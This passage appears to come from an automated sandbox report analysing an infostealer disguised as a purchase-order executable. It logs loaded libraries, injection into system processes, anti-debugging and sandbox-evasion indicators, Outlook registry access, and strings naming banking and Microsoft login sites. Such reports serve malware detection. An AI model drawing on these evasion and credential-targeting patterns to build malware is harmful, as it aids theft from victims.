            Source: C:\Windows\SysWOW64\grpconv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Purchase Order_ AEPL-2324-1126.exeStatic file information: File size 1509575 > 1048576
            Source: Binary string: grpconv.pdb source: svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: grpconv.pdbGCTL source: svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JkyHsYXxoyjW.exe, 00000003.00000002.3862718845.00000000005BE000.00000002.00000001.01000000.00000004.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3858733307.00000000005BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472280499.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471126837.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1500202206.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498259750.0000000003300000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1630288499.000000000436D000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1627999026.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.0000000004520000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472280499.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471126837.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1628089939.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1500202206.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498259750.0000000003300000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000005.00000002.3869522876.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1630288499.000000000436D000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1627999026.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.0000000004520000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3870343838.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000000.1694933032.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1925812145.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3870343838.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000000.1694933032.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1925812145.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414860 push ebp; retf 2_2_00414861
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041480D push es; iretd 2_2_0041480F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F0FC pushad ; ret 2_2_0041F12D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004120A9 push ss; iretd 2_2_004120AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031A0 push eax; ret 2_2_004031A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041826C push ds; iretd 2_2_0041827D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004082E5 push 00000009h; retf 2_2_00408401
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004182EF push ebx; iretd 2_2_0041831C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040834C push 00000009h; retf 2_2_00408401
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414459 pushfd ; retf 2_2_00414462
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BE2C pushad ; ret 2_2_0040BE2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CEEF push 00000033h; iretd 2_2_0040CF00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A724 push ss; retf 2_2_0041A725
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A7D6 push edx; ret 2_2_0041A7D7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004117F3 push ds; iretd 2_2_004117F4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045509AD push ecx; mov dword ptr [esp], ecx5_2_045509B6
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002EC1C3 push cs; ret 5_2_002EC1D7
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002DE650 push ds; iretd 5_2_002DE651
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002D8C89 pushad ; ret 5_2_002D8C8A
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002DEF06 push ss; iretd 5_2_002DEF07
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E50C9 push ds; iretd 5_2_002E50DA
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E514C push ebx; iretd 5_2_002E5179
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002D5142 push 00000009h; retf 5_2_002D525E
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002D51A9 push 00000009h; retf 5_2_002D525E
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E7581 push ss; retf 5_2_002E7582
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E7633 push edx; ret 5_2_002E7634
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E166A push es; iretd 5_2_002E166C
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E16BD push ebp; retf 5_2_002E16BE
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002EDA1F push eax; retf 5_2_002EDA20
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeAPI/Special instruction interceptor: Address: 40032B4
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
            Source: C:\Windows\SysWOW64\grpconv.exeWindow / User API: threadDelayed 6872Jump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeWindow / User API: threadDelayed 3101Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87608
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\grpconv.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\grpconv.exe TID: 7784Thread sleep count: 6872 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exe TID: 7784Thread sleep time: -13744000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exe TID: 7784Thread sleep count: 3101 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exe TID: 7784Thread sleep time: -6202000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep time: -58500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep count: 44 > 30Jump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep time: -44000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\grpconv.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002EC5F0 FindFirstFileW,FindNextFileW,FindClose,5_2_002EC5F0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 1ySo2KZ76.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 1ySo2KZ76.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 1ySo2KZ76.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 1ySo2KZ76.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 1ySo2KZ76.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 1ySo2KZ76.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 1ySo2KZ76.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 1ySo2KZ76.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 1ySo2KZ76.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: JkyHsYXxoyjW.exe, 00000006.00000002.3864755286.0000000000D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
            Source: 1ySo2KZ76.5.drBinary or memory string: discord.comVMware20,11696492231f
            Source: 1ySo2KZ76.5.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 1ySo2KZ76.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 1ySo2KZ76.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 1ySo2KZ76.5.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 1ySo2KZ76.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: 1ySo2KZ76.5.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: 1ySo2KZ76.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 1ySo2KZ76.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 1ySo2KZ76.5.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
            Source: 1ySo2KZ76.5.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 1ySo2KZ76.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 1ySo2KZ76.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 1ySo2KZ76.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: firefox.exe, 00000008.00000002.1927161385.0000029EA137C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeAPI call chain: ExitProcess graph end nodegraph_0-86739
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004176C3 LdrLoadDll,2_2_004176C3
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_04003520 mov eax, dword ptr fs:[00000030h]0_2_04003520
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_04003580 mov eax, dword ptr fs:[00000030h]0_2_04003580
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_04001EE0 mov eax, dword ptr fs:[00000030h]0_2_04001EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
